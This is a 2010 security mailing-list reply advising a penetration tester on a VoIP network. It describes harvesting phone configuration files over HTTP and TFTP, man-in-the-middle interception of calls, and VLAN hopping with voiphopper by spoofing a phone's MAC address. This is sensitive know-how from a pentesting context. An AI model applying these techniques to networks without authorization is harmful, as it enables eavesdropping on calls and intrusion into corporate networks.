mailing list archives
Re: pentesting voip network-please help
From: "Champ Clark III [Softwink]" <champ () softwink com>
Date: Wed, 3 Feb 2010 13:53:59 -0500
On Fri, Jan 29, 2010 at 01:14:04PM -0500, mzcohen2682 () aim com wrote:
I started by trying to download the images files for the phones from
the tftp server by doing a brute force attack for the names of the
Check to see if the phones have web services enabled. A lot of
times, they do. This will give you the MAC address of each phone,
which you can use to pull down the configuration files. I've simply
scanned the network for port 80 then 'wget' all the phone
configurations. From there, with a little shell scripting, you
can write a routine to pull all the configuration files via TFTP.
That's if they have the web services enabled. I'm assuming
they are using SCCP.
Once you have them all, use 'grep' to find the interesting
after that... I tried to capture some RTP conversations but without any
success. I am connected to the voip vlan and used wireshark but It
doesnt detect any calles ! shoud I do some arp spoofing attack? but to
You'll need to MiTM it before you start seeing anything. I've
been at offices (multi-floor) that have default gateways for each flow.
That's the address I've MiTM.
any other ideas how to continue with this pentest?
what I see is that although the client didnt implement encryption or
any other security control just the vlan isnt not so eaxy to pentest a
Nah. People often confused VLAN == security. What I've done in
the past is get a valid MAC address of a phone and use voiphopper
(http://voiphopper.sourceforge.net) to "jump" to the VoIP VLAN.
Voiphopper can "masqurade" as a Cisco phone and with the MAC address the
network won't notice any difference.
Of course, it'll be your laptop masqurading. So once you're
on the network, it sorta just becomes a "standard" pen-test. MiTM,
looking for unpatched machines, etc..etc...
Hope this helps....
Champ Clark III | Softwink, Inc | 800-538-9357 x 101
GPG Key ID: 58A2A58F
Key fingerprint = 7734 2A1C 007D 581E BDF7 6AD5 0F1F 655F 58A2 A58F
If it wasn't for C, we'd be using BASI, PASAL and OBOL.